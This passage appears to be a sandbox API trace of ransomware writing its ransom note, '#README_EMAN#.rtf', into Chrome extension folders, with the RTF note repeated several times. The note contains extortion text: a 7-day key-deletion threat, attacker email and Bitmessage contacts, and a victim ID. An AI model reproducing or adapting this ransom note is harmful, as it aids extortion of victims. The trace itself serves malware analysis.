EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n7äHcénøvÙ|åÀËåVÖ\x05\x04u\x10ªïu3 ", lpUsedDefaultChar=0x0) returned 8717 [0289.254] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.255] CloseHandle (hObject=0x2d4) returned 1 [0289.255] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0289.255] GetLastError () returned 0x2 [0289.255] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0289.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 